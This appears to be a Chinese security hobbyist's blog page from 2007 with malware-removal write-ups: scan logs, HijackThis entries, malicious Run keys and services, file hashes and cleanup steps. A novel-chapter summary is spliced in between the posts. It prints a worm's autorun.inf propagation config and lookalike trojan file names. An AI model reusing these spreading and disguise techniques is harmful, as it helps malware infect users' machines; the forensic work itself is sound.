C:\WINDOWS\system32\ridiap070402.exe>>upack0.36 Trojan.Clicker.PopHot.cq
C:\WINDOWS\system32\scrie070402.scr>>upack0.36 Trojan.Clicker.PopHot.cq
C:\WINDOWS\system32\SVCH0ST.EXE Backdoor.Agent.ibv
C:\WINDOWS\cmdbcs.exe Trojan.PSW.OnlineGames.aaq
C:\Documents and Settings\Administrator\Local Settings\Temp\ck3.exe.exe>>UPX Trojan.PSW.Agent.jqu
C:\Documents and Settings\Administrator\Local Settings\Temp\Qqzo0.dll Trojan.PSW.OnlineGames.yo
C:\Documents and Settings\Administrator\Local Settings\Temp\LgSy0.dll>>UPX Trojan.PSW.XYOnline.nc
C:\Documents and Settings\Administrator\Local Settings\Temp\lg.dll Trojan.PSW.LMir.mhl
C:\Documents and Settings\Administrator\Local Settings\Temp\banner.jpg>>UPX Trojan.PSW.QQPass.rtq
C:\Documents and Settings\Administrator\Local Settings\Temp\LgSy1.dll>>UPX Trojan.PSW.XYOnline.nc
C:\Documents and Settings\Administrator\Local Settings\Temp\Qqzo1.dll Trojan.PSW.OnlineGames.yo
C:\Documents and Settings\Administrator\Local Settings\Temp\Rav30.dll>>UPX Trojan.PSW.OnlineGames.yq
C:\Documents and Settings\Administrator\Local Settings\Temp\Msxo1.dll>>UPX Trojan.PSW.OnlineGames.yw
C:\Documents and Settings\Administrator\Local Settings\Temp\LgSy2.dll>>UPX Trojan.PSW.OnlineGames.yv
C:\Documents and Settings\Administrator\Local Settings\Temp\Gjzo1.dll>>UPX Trojan.PSW.OnlineGames.yu
C:\Documents and Settings\Administrator\Local Settings\Temp\Rav31.dll>>UPX Trojan.PSW.OnlineGames.yq
C:\Documents and Settings\Administrator\Local Settings\Temp\Rav21.dll>>upack0.34 Trojan.PSW.OnlineGames.yx
C:\Documents and Settings\Administrator\Local Settings\Temp\Wmzo1.dll>>UPX Trojan.PSW.OnlineGames.yz
C:\Documents and Settings\Administrator\Local Settings\Temp\Gjzo0.dll>>UPX Trojan.PSW.OnlineGames.yu
C:\Documents and Settings\Administrator\Local Settings\Temp\Msxo0.dll>>UPX Trojan.PSW.OnlineGames.yw
C:\Documents and Settings\Administrator\Local Settings\Temp\Rav20.dll>>upack0.34 Trojan.PSW.OnlineGames.yx
C:\Documents and Settings\Administrator\Local Settings\Temp\Wmzo0.dll>>UPX Trojan.PSW.OnlineGames.yz
C:\Documents and Settings\Administrator\Local Settings\Temp\shua.exe.exe>>UPX Trojan.PSW.QQPass.rvt
C:\Program Files\Common Files\Microsoft Shared\MSInfo\NewInfo.rxk Trojan.PSW.QQPass.rug
C:\Program Files\Internet Explorer\PLUGINS\system2.jmp Trojan.PSW.QQPass.rtw
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys Trojan.PSW.QQPass.rtn
C:\Program Files\Internet Explorer\IEXPLORE.Sys Trojan.PSW.QQPass.rtq
C:\Program Files\Internet Explorer\IEXPLORE.win Trojan.PSW.QQPass.rtp
C:\Program Files\Internet Explorer\IEXPLORE.Dat Trojan.PSW.QQPass.rts
C:\Program Files\Internet Explorer\IEXPLORE.Tmp Trojan.PSW.Agent.jqu
C:\Program Files\Internet Explorer\IEXPLORE.Bak Trojan.PSW.QQPass.rvt
C:\CONFIG.EXE>>fsg2.0 Trojan.DL.Delf.yfw
D:\mie.com>>upack0.36 Trojan.Clicker.PopHot.cq

到 http://endurer.ys168.com 下载 瑞星杀毒助手来解决，O24那几个删除不了（需要先用IceSword从内存中卸载），偶用了下次启动时删除功能。

再下载 Dr.Web Cure It扫描，又是一堆，其中很多Windows系统文件infected with Trojan.Starter.171，看来江民的Viking专杀还得继续升级。

Dr.Web(R) Scanner for Windows v4.33.2 (4.33.2.10067)
Log generated on: 2007-04-04, 10:49:36 [Administrator]

c:\documents and settings\localservice\local settings\temporary internet files\content.ie5\6yb6gzi7\qq[1].exe infected with Trojan.DownLoader.17951 - deleted
c:\program files\internet explorer\plugins\systemkb.sys infected with Trojan.PWS.Qqpass.510 - will be cured after reboot
c:\windows\inf\unregmp2.exe infected with Trojan.Starter.171 - cured
c:\windows\system32\alg.exe infected with Trojan.Starter.171 - cured
……
c:\windows\system32\vssvc.exe infected with Trojan.Starter.171 - cured
c:\windows\system32\wbem\wmiapsrv.exe infected with Trojan.Starter.171 - cured
c:\windows\system32\wdfmgr.exe infected with Trojan.Starter.171 - cured
C:\Program Files\Common Files\Microsoft Shared\asoee.exe probably infected with DLOADER.Trojan
C:\Program Files\Windows Media Player\hwswl.exe probably infected with DLOADER.Trojan
C:\Program Files\Internet Explorer\Connection Wizard\aanaa.exe probably infected with DLOADER.Trojan
C:\Program Files\Internet Explorer\PLUGINS\SystemKb.sys infected with Trojan.PWS.Qqpass.510 - will be cured after reboot
C:\WINDOWS\twunk_32.exe infected with Trojan.Starter.171 - cured
……
C:\WINDOWS\Alcrmv.exe infected with Trojan.Starter.171 - cured
C:\WINDOWS\system32\sort.exe infected with Trojan.Starter.171 - cured
……
C:\WINDOWS\system32\ayhip.exe probably infected with DLOADER.Trojan
C:\WINDOWS\system32\kmoau.exe probably infected with DLOADER.Trojan
C:\WINDOWS\system32\mcdsrv32_070402.dll probably infected with DLOADER.Trojan
C:\WINDOWS\system32\notepad.exe.delete_on_reboot.delete_on_reboot.delete_on_reboot.delete_on_reboot infected with Trojan.Starter.171 - will be cured after reboot
C:\WINDOWS\system32\drivers\kekci.exe probably infected with DLOADER.Trojan
……
C:\WINDOWS\system32\wbem\mofcomp.exe infected with Trojan.Starter.171 - cured
……
C:\WINDOWS\system32\npp\nppagent.exe infected with Trojan.Starter.171 - cured
C:\WINDOWS\system32\dllcache\twunk_32.exe infected with Trojan.Starter.171 - cured
……
>C:\WINDOWS\system32\dllcache\ykwcs.exe probably infected with DLOADER.Trojan
C:\WINDOWS\system32\usmt\migload.exe infected with Trojan.Starter.171 - cured
……
>C:\WINDOWS\system32\IME\kumsu.exe probably infected with DLOADER.Trojan
C:\WINDOWS\system32\IME\PINTLGNT\IMSCINST.EXE infected with Trojan.Starter.171 - cured
C:\WINDOWS\system32\Com\comrepl.exe infected with Trojan.Starter.171 - cured
C:\WINDOWS\system32\Restore\srdiag.exe infected with Trojan.Starter.171 - cured
C:\WINDOWS\system32\Macromed\Flash\genuinst.exe infected with Trojan.Starter.171 - cured
……
C:\WINDOWS\system32\ReinstallBackups\0002\DriverFiles\SOUNDMAN.EXE infected with Trojan.Starter.171 - cured
……
C:\WINDOWS\system32\NMGameX\iLobby\ilobby.exe infected with Trojan.Starter.171 - cured
>C:\WINDOWS\system\bmxny.exe probably infected with DLOADER.Trojan
C:\WINDOWS\msagent\agentsvr.exe infected with Trojan.Starter.171 - cured
>C:\WINDOWS\addins\ywwca.exe probably infected with DLOADER.Trojan
C:\WINDOWS\Temp\alcupd.exe infected with Trojan.Starter.171 - cured
……
C:\WINDOWS\ime\jpwb\unins000.exe infected with Trojan.Starter.171 - cured
……
C:\WINDOWS\Installer\{90110804-6000-11D3-8CFE-0150048383C9}\unbndico.exe infected with Trojan.Starter.171 - cured

修复：

最好是格式化硬盘所有分区，重装系统……

因为修复太麻烦了……

O2 - BHO Advance Helper - {8E25AC4A-B129-451B-BEE2-3B510BB751DA} - C:\WINDOWS\system32\NTDLL32.dll
O2 - BHO IE Browser Helper - {D0903A3B-F0EA-434a-9742-98C5335C7946} - C:\WINDOWS\system32\IEHelper.dll
O20 - AppInit_DLLs: C:\WINDOWS\system32\NTDLL32.dll
用IceSword才搞定。

O24项 用瑞星卡卡安全助手

其它的用HijackThis

病毒文件太多，把它们拖到bat_do自动打包都手软，不愿测试了……

大侠狄龙子 8回 概要 endurer评注 文麟被捉欲结异姓骨肉 肥婆遭戏触怒凶犀身亡

第 八 回 同病应相怜　对此清辉　愿言永夕 幽情谁与　诉曾经沧海　难恋落花

　　文麟被三姑、五哥、五姊（冯姑娘）点了哑穴，藏在竹林中，等采芹、问梅被大黄声音引去，由三姑背着从小山后面缺口绕出。
　　文麟被三姑解穴后，挑拔离间，三姑打帅大娘。
　　路上三姑听见有人冷笑之声。
　　龙子、珊儿、袁和尚得一位前辈异人指点到青松崖打击帅大娘。火烧三姑房子，将众人人引走。珊儿告诉文麟，简冰如对头前来寻仇，今晚不要喝醉，上当受害。
　　随后袁和尚也悄悄告诉麟，心要拿稳，不可受贼婆娘的骗。
　　三姑令二婢往追。二婢报告，向家弟兄、陈四姑追敌到牛角坝西面，遇异人，帅大娘触怒冯大所养凶犀，被杀。玉香被花子绊倒。
　　冯浩赶去。
　　众人入酒席至天明。
　　冯浩归来说姜老前辈驾临。冯老亲笔书信约人。
　　三姑说冯老是想为儿子门人报仇，并除后患，昨夜再三力阻，如今又全推在自己身上。安排文麟休息。
　　文麟睡到下午，发现二婢被人捆绑塞口，询问得知今早三姑帮文麟脱去长衣，隔着被头躺了一会。粮仓起火，三姑擒了八大公的徒孙走去。二婢被狄龙子点倒绑起，盘问三姑与文麟有无苟且之事。狄龙子告诉文麟在此恐还有数日耽搁，简冰如日内也要回山。沈煌、明霞、珊儿先颇着急，得一位老前辈再三解说方始放心，过两三天同来接你。
　　三姑与文麟到玩月亭对饮，见文麟并无爱好之意，说明日放人。
　　文麟说下次来此与三姑再叙年庚，结为异姓骨肉。

endurer评注

本节人物太多，有些都不清楚前有所述是否为同一人
三姑一念痴情落得四面楚歌……
冯浩所说姜老前辈就是简冰如对头的对头吗？

［人］韩家夫妇

［人］五哥：穿着一身淡黄色衣扣短装，背插钢刀，腰挂鱼鳞皮袋，神情动作甚是矫捷。

［人］五姊、冯姑娘：穿着一身淡黄色衣扣短装，背插钢刀，腰挂鱼鳞皮袋，神情动作甚是矫捷。

冯婉如：生得骨瘦如柴，一脸病容，缠着半大不细的拱背弯脚，方才那么凶横，行路如飞，到了楼内，走起路来偏一扭一扭的，不时朝着同座一个姓刘及一个姓朱的男子乱飞媚眼，满身丑态，看去都觉恶心。……语言无谓，面目可憎，一身丑态，词色又极骄横，看去讨厌……淫凶无比，既贪且狠，更喜拨弄是非，表面和我亲热，实则到处拨弄长舌，无事生非

［人］尤玉珍：戴鬼脸壳的婆娘，是冯家老鬼的干女儿，乃蔡三姑死党。

［人］飞雷手田震：一个是尤玉珍丈夫

［人］冯佐、冯嘉：老鬼冯八公之子，是尤玉珍义兄

［人］韩氏夫妇

［武］解哑穴：腰间忽被人捏了一把，酸痛非常，知是三姑所为，心方暗骂不要脸的泼妇。同时又听叭的一下，后背心中了一掌，骤出不意，这一下又打得颇重，竟被打出好几尺远

［人］司徒良珠：脱略形迹，落落大方，但极自然端雅，于仪态万方之中使人自生敬意

［人］：人并不高，看去像个光头小孩，下面赤脚，穿着一双草鞋，上衣甚短，两袖却极长大，走起路来和蝴蝶一样，动作如飞

［人］文麟：人最温和，平日不出恶言……性情刚直……喜吃那韭芽春笋和鸡肉丝所制春卷

［人］袁和尚：胆大包身，性又强横……乃野兽所生，仗着身轻力大和老和尚的纵容，无所不为，多大乱子他也敢惹

［人］珊儿：木师姑所收门人，平日刁钻古怪，专喜多事

［人］狄龙子：身材稍高、身穿短衣的幼童，身法颇似得有峨眉派传授……年纪虽轻，武功颇好，最奇是那等身轻力大，竟在珊儿、袁和尚……之上。……身着短装，腰横虎皮，光看两条毛腿，脚穿一双草鞋，胸插短刀和另一件带链子的兵器

［人］向家两位相公、向二相公

［人］陈四姑

［人］玉香：三姑婢女

［人］花子：数十年假扮乞丐游戏江湖的共只三人，一位已多年不管闲事；一位与爹爹相识年久，多少有点情面；只内中一位脾气古怪，自来有他无人，心狠手黑

［人］杨金凤：中人之姿，人也比较稳重

［人］夏山兰；身材微胖的丑妇，面如枣色，说起话来，涎沫横飞……语言无谓，面目可憎，一身丑态，词色又极骄横，看去讨厌

［人］冯娇：少女虽然愁眉苦脸，因其不多说话，还不十分讨嫌

［人］冯浩：矮子

［人］刘独：与冯浩同门世交……外表也似一个读书人

［人］朱大城：与冯浩同门世交人颇谦和，说话也有条理，不像绿林中人……文武皆通……隐居本山已有多年，并还不是绿林中人，不过与三姑上辈交情太深，遇请必至，故来赴约，平日无什往还

［人］姜老前辈：一到，多厉害的敌人也不足为虑

［人］雷鹏：姜老前辈爱徒

旧雨楼·还珠楼主《大侠狄龙子》 全文

又一位网友中了Viking,Trojan.PSW.OnLineGames.abo,Trojan.PSW.SBoy.b等

endurer 原创
2007-04-04 第1版

昨晚，一位网友说，他的电脑工作速度很慢，浏览网页时自动弹广告，让偶帮助检查一下。

让他先用HijackThis（可到http://endurer.ys168.com下载）扫描log传过来一看，估计是Viking了。

让他传了几个可疑文件过来。

同时到江民网站下载了Viking专杀工具传给网友查杀，果然清除了一些。

又将pe_xscan、ProcView（可到http://endurer.ys168.com下载）、IceSword（可到http://endurer.ys168.com下载）传了过去。

通过在线网页分析网友传回的pe_xscan的log，发现可疑项目：
/===
pe_xscan 07-03-17 by Purple Endurer
2007-4-3 22:38:52
Windows XP Service Pack 2(5.1.2600)
管理员用户组
[System Process] * 0
c:\PROGRA~1\iesnap\navstub.dll 2007-3-12 10:28:38
C:\PROGRA~1\bvxe\rinu.dll 2007-4-2 17:7:24
C:\PROGRA~1\bvxe\wnsw.dll 2007-4-2 17:7:24
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\LgSy0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Rav20.dll
C:\WINDOWS\System32\svchost.exe * 892
c:\windows\system32\bxwhj.dll
c:\program files\iesnap\navoct.dll 2007-3-12 10:28:46
C:\PROGRA~1\bvxe\rinu.dll 2007-4-2 17:7:24
C:\PROGRA~1\bvxe\wnsw.dll 2007-4-2 17:7:24
c:\PROGRA~1\iesnap\navstub.dll 2007-3-12 10:28:38
C:\WINDOWS\system32\EXPLORER.EXE * 1520 2006-10-25 8:32:36
C:\WINDOWS\system32\EXPLORER.EXE 2006-10-25 8:32:36
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk 2007-4-3 11:44:24
C:\WINDOWS\system32\winform.dll 2007-4-3 11:44:26
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\LgSy0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Rav20.dll
c:\PROGRA~1\iesnap\navstub.dll 2007-3-12 10:28:38
C:\PROGRA~1\bvxe\rinu.dll 2007-4-2 17:7:24
C:\PROGRA~1\bvxe\wnsw.dll 2007-4-2 17:7:24
c:\windows\system32\bxwhj.dll
C:\WINDOWS\Explorer.EXE * 1548
C:\PROGRA~1\WinKld\Winkld.dat 2006-4-30 15:18:52
C:\PROGRA~1\gxcj\hydk.nls 2007-4-2 17:45:12
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\LgSy0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Rav20.dll
C:\PROGRA~1\bvxe\rinu.dll 2007-4-2 17:7:24
C:\PROGRA~1\bvxe\wnsw.dll 2007-4-2 17:7:24
c:\PROGRA~1\iesnap\navstub.dll 2007-3-12 10:28:38
C:\Program Files\superutilbar\superutilbar.dll 2007-3-19 9:44:48
C:\Documents and Settings\Administrator\Application Data\Foxy\LinkMaker.dll 2006-12-24 13:34:50
C:\WINDOWS\VM_STI.EXE * 1744 2005-2-28 17:53:4
C:\PROGRA~1\bvxe\rinu.dll 2007-4-2 17:7:24
C:\PROGRA~1\bvxe\wnsw.dll 2007-4-2 17:7:24
c:\PROGRA~1\iesnap\navstub.dll 2007-3-12 10:28:38
C:\WINDOWS\system32\ctfmon.exe * 1836
c:\PROGRA~1\iesnap\navstub.dll 2007-3-12 10:28:38
C:\PROGRA~1\bvxe\rinu.dll 2007-4-2 17:7:24
C:\PROGRA~1\bvxe\wnsw.dll 2007-4-2 17:7:24
C:\WINDOWS\system32\rundll32.exe * 288
C:\PROGRA~1\bvxe\ofkr.dll 2007-4-2 17:7:24
C:\PROGRA~1\bvxe\rinu.dll 2007-4-2 17:7:24
C:\PROGRA~1\bvxe\wnsw.dll 2007-4-2 17:7:24
C:\PROGRA~1\bvxe\tkpw.dll 2007-4-2 17:7:24
c:\PROGRA~1\iesnap\navstub.dll 2007-3-12 10:28:38
C:\WINDOWS\system32\nvsvc32.exe * 440 2005-12-10 3:6:0
C:\PROGRA~1\bvxe\rinu.dll 2007-4-2 17:7:24
C:\PROGRA~1\bvxe\wnsw.dll 2007-4-2 17:7:24
c:\PROGRA~1\iesnap\navstub.dll 2007-3-12 10:28:38
c:\PROGRA~1\iesnap\navplay.exe * 2204 2007-3-12 10:28:22
c:\PROGRA~1\iesnap\navplay.exe 2007-3-12 10:28:22
c:\PROGRA~1\iesnap\navstub.dll 2007-3-12 10:28:38
C:\PROGRA~1\bvxe\rinu.dll 2007-4-2 17:7:24
C:\PROGRA~1\bvxe\wnsw.dll 2007-4-2 17:7:24
C:\Program Files\Internet Explorer\iexplore.exe * 1380 2004-8-17 20:0:0
c:\PROGRA~1\iesnap\navstub.dll 2007-3-12 10:28:38
C:\PROGRA~1\bvxe\rinu.dll 2007-4-2 17:7:24
C:\PROGRA~1\bvxe\wnsw.dll 2007-4-2 17:7:24
C:\Program Files\superutilbar\superutilbar.dll 2007-3-19 9:44:48
c:\PROGRA~1\iesnap\navpref.dll 2007-3-12 10:28:8
c:\PROGRA~1\iesnap\navseg.dll 2007-3-12 10:28:12
c:\PROGRA~1\iesnap\navneg.dll 2007-3-12 10:28:20
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\LgSy0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Rav20.dll
C:\WINDOWS\system32\conime.exe * 2764
c:\PROGRA~1\iesnap\navstub.dll 2007-3-12 10:28:38
C:\PROGRA~1\bvxe\rinu.dll 2007-4-2 17:7:24
C:\PROGRA~1\bvxe\wnsw.dll 2007-4-2 17:7:24
C:\Program Files\QQ2006\QQ.exe * 5340 2006-5-9 17:23:22
C:\WINDOWS\system32\baqftx.dll 2007-4-3 11:44:26
c:\PROGRA~1\iesnap\navstub.dll 2007-3-12 10:28:38
C:\PROGRA~1\bvxe\rinu.dll 2007-4-2 17:7:24
C:\PROGRA~1\bvxe\wnsw.dll 2007-4-2 17:7:24
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\LgSy0.dll
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\Rav20.dll
C:\Program Files\QQ2006\TIMPlatform.exe * 6124 2006-4-25 16:13:36
c:\PROGRA~1\iesnap\navstub.dll 2007-3-12 10:28:38
C:\PROGRA~1\bvxe\rinu.dll 2007-4-2 17:7:24
C:\PROGRA~1\bvxe\wnsw.dll 2007-4-2 17:7:24
wsctf.exe * 4508

F2 - REG: system.ini: UserInit=userinit.exe,EXPLORER.EXE

O2 - BHO: YDragSearch - {62EED7C6-9F02-42f9-B634-98E2899E147B} - C:\PROGRA~1\Yahoo!\ASSIST~1\Assist\YDRAGS~1.DLL (file missing)

O2 - BHO: 实用搜索 - {6CFD436C-7AAD-4e50-992F-C0C87A94CAD2} - C:\Program Files\superutilbar\superutilbar.dll

O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)

O3 - Toolbar: 实用搜索工具条2.0 - {03465FF5-00AE-411a-9C34-960ED566EC03} - C:\Program Files\superutilbar\superutilbar.dll

O4 - HKCR\..\Run: [BSserver] FileKan.exe
O4 - HKCR\..\Run: [foxy] "C:\Program Files\摩力游下载器\Foxy.exe" -tray
O4 - HKCR\..\Run: [EXPLORER.EXE] EXPLORER.EXE
O4 - HKCR\..\Run: [wsctf.exe] wsctf.exe
O4 - HKCR\..\Run: [5ikbi] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\winlog0n.exe
O4 - HKCR\..\Run: [mq2j0v88lr8b] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\rundl132.exe
O4 - HKCR\..\Run: [16jt8321q] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\iexpl0re.exe
O4 - HKLM\..\Run: [ASocksrv] SocksA.exe
O4 - HKLM\..\Run: [BigDogPath] C:\WINDOWS\VM_STI.EXE Vimicro USB PC Camera (ZC0301PL)
O4 - HKLM\..\Run: [System] C:\Program Files\Common Files\System\Updaterun.exe
O4 - HKLM\..\Run: [winform] C:\WINDOWS\winform.exe
O4 - HKLM\..\Run: [nrauax] C:\WINDOWS\system32\baqftx.exe
D:\autorun.inf
/-----
[AutoRun]
open=sxs.exe
shellexecute=sxs.exe
shell\Auto\command=sxs.exe
-----/
E:\autorun.inf
/-----
[AutoRun]
open=sxs.exe
shellexecute=sxs.exe
shell\Auto\command=sxs.exe
-----/
F:\autorun.inf
/-----
[AutoRun]
open=sxs.exe
shellexecute=sxs.exe
shell\Auto\command=sxs.exe
-----/
O8 - IE右键菜单附加项 : Foxy 下载 - res://C:\Program Files\摩力游下载器\Foxy.exe/download.htm
O8 - IE右键菜单附加项 : Foxy 搜索 - res://C:\Program Files\摩力游下载器\Foxy.exe/search.htm
O21 - SSODL - SysTime(88Dog.Kalendar) - {724C75F1-B757-408D-A50A-4CF99DA35D73} = C:\PROGRA~1\WinKld\WinKld.dll
O21 - SSODL - hydk(Windows hydk Theme) - {7FCA49CC-AC89-473E-98EC-A62AFBDCA32A} = C:\PROGRA~1\gxcj\hydk.dll

O23 - 服务: Investor (Remote Route Service) - C:\WINDOWS\System32\svchost.exe -k netsvcs -> C:\WINDOWS\system32\bxwhj.dll Microsoft(R) Windows(R) Operating System 5.1.2600.0 szdj Copyright (C) Microsoft Corporation 1990-2000 5.1.2600.0 Microsoft Corporation ? szdj szdj.dll(自动)
O23 - 服务: jafm (Std jafm Service) - C:\WINDOWS\system32\rundll32.exe C:\PROGRA~1\bvxe\ofkr.dll,Service -s(自动)
O23 - 服务: Navoct () - C:\WINDOWS\System32\svchost.exe -k netsvcs -> C:\Program Files\iesnap\navoct.dll 2007-3-12 10:28:46 NAVOCT 1, 0, 1, 1 NAVOCT Module Copyright 2006 1, 0, 1, 1 NAVOCT NAVOCT.DLL(自动)

O23 - 服务: SOCEESe (Indexing Data) - C:\WINDOWS\SYSTEM32\RUNDLL2000.EXE C:\WINDOWS\SYSTEM32\WBEM\CZKBM.DLL,Export 1087(自动)

O24 - [] - {A6011F8F-A7F8-49AA-9ADA-49127D43138F} = C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk

SHOWALL Type isn't dowrd
===/

使用ProcView和IceSword终止进程：

C:\WINDOWS\system32\EXPLORER.EXE
C:\WINDOWS\system32\wsctf.exe
C:\WINDOWS\system32\algsrv.exe
C:\WINDOWS\system32\baqftx.exe
C:\WINDOWS\SYSTEM32\RUNDLL2000.EXE

用WinRAR删除d、e、f盘下的 autorun.inf 和 sxs.exe。在c盘下发现 tel.xls.exe。

用HijackThis修复 F2--O21，删除O23

用瑞星卡卡安全助手卸载 O24

卸载：实用搜索

重启电脑到安全模式下

删除文件：

C:\Documents and Settings\Administrator\LOCALS~1\Temp\LgSy0.dll
C:\Documents and Settings\Administrator\LOCALS~1\Temp\Rav20.dll
C:\Documents and Settings\Administrator\LOCALS~1\Temp\winlog0n.exe
C:\Documents and Settings\Administrator\Temp\rundl132.exe
C:\Documents and Settings\Administrator\Temp\iexpl0re.exe
C:\Program Files\Common Files\Microsoft Shared\MSINFO\NewInfo.rxk
C:\Program Files\Common Files\System\Updaterun.exe
C:\WINDOWS\system32\baqftx.dll
C:\WINDOWS\system32\baqftx.exe
c:\windows\system32\bxwhj.dll
c:\windows\system32\EXPLORER.EXE
C:\WINDOWS\SYSTEM32\RUNDLL2000.EXE C:\WINDOWS\SYSTEM32\WBEM\CZKBM.DLL
C:\WINDOWS\winform.exe
C:\WINDOWS\system32\winform.dll
c:\windows\system32\wsctf.dll
c:\windows\system32\wsctf.exe
C:\WINDOWS\SYSTEM32\WBEM\CZKBM.DLL
FileKan.exe(一般是在C:\WINDOWS\system32下)
SocksA.exe(一般是在C:\WINDOWS\system32下)

删除文件夹：
C:\Documents and Settings\Administrator\Application Data\Foxy
c:\program files\bvxe
c:\program files\gxcj
c:\program files\iesnap
c:\program files\WinKld
C:\Program Files\superutilbar

用开始-->程序-->附件-->系统工具-->磁盘清理 来清理C盘

用WinRAR 清空 c:\windows\prefetch

参考：【系统修复系列之】如何 显示所有的文件和文件夹
http://endurer.blogchina.com/2590659.html
来修复：SHOWALL Type isn't dowrd

文件说明符 : D:\test\sxs.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-3 23:25:37
修改时间 : 2007-4-3 23:26:3
访问时间 : 2007-4-4 20:49:25
大小 : 37725 字节 36.861 KB
MD5 : 25f7ddf928dcb04b51987d7e4bdde809

baqftx.exe与此相同。

Kaspersky 报为 Trojan-PSW.Win32.QQPass.se，瑞星 报为 Trojan.PSW.QQPass.rdr

文件说明符 : D:\test\tel.xls.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 2.00
说明 :
版权 :
备注 :
产品版本 : 2.00
产品名称 : FireWall Files
公司名称 : Microsoft Corp.
合法商标 :
内部名称 : test
源文件名 : test.exe
创建时间 : 2007-4-3 23:20:40
修改时间 : 2007-4-3 23:20:52
访问时间 : 2007-4-4 20:49:54
大小 : 69632 字节 68.0 KB
MD5 : 40dbf5d5f83400a1901b9a7f8d294d5e
algsrv.exe与tel.xls.exe相同。

Kaspersky 报为 Trojan.Win32.VB.atg，瑞星 报为 Trojan.VB.vtj

文件说明符 : D:\test\NewInfo.rxk
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-3 22:57:40
修改时间 : 2007-4-3 22:57:45
访问时间 : 2007-4-4 20:54:18
大小 : 27301 字节 26.677 KB
MD5 : 69e32435d00cff4f8ca09059e5dc6bfc

Kaspersky 报为 Trojan-PSW.Win32.Delf.qc，瑞星 报为 Trojan.PSW.Liumazi.kr

文件说明符 : D:\test\wsctf.exe
属性 : A---
语言 : 中文(中国)
文件版本 : 5.2600.2180
说明 : Generic Host service for Win32 Services
版权 : (C) Microsoft Corporation. All rights reserved.
备注 : Generic Host service for Win32 Services
产品版本 : 5.2600.2180
产品名称 : Microsoft Windows Operating System
公司名称 : Microsoft Corporation
合法商标 :
内部名称 : wsctf
源文件名 : wsctf.exe
创建时间 : 2007-4-3 22:14:24
修改时间 : 2007-4-3 22:14:28
访问时间 : 2007-4-4 20:58:20
大小 : 24576 字节 24.0 KB
MD5 : cbdcf0ab0561540891a3e466147a4ce4

Kaspersky 报为 Virus.Win32.VB.bu，瑞星 报为 Trojan.PSW.SBoy.b

文件说明符 : D:\test\winform.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-3 22:14:3
修改时间 : 2007-4-3 22:14:15
访问时间 : 2007-4-4 21:2:17
大小 : 17920 字节 17.512 KB
MD5 : 72cf3bc3a233ec373303de7a81dd4051

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.es，瑞星 报为 Trojan.PSW.OnlineGames.aas

文件说明符 : D:\test\winlog0n.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-3 22:11:55
修改时间 : 2007-4-3 22:13:8
访问时间 : 2007-4-4 21:5:10
大小 : 33690 字节 32.922 KB
MD5 : 4cb1851156c0b3f6dda4092462f57222

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.kw，瑞星 报为 Trojan.PSW.OnLineGames.abo

文件说明符 : D:\test\iexpl0re.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-3 22:12:59
修改时间 : 2007-4-3 22:13:17
访问时间 : 2007-4-4 21:6:58
大小 : 52736 字节 51.512 KB
MD5 : 05366f5d07a2a45b3d076f4a27f21a74

文件说明符 : D:\test\rundl132.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-3 22:9:56
修改时间 : 2007-4-3 22:12:10
访问时间 : 2007-4-4 21:16:20
大小 : 33244 字节 32.476 KB
MD5 : dfd16dbc703e1359c22dffaf91251738

文件说明符 : D:\test\Updaterun.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-4-3 22:32:4
修改时间 : 2007-4-3 22:32:16
访问时间 : 2007-4-4 21:28:56
大小 : 36864 字节 36.0 KB
MD5 : 42d61fba39892131e0c81472d291bc61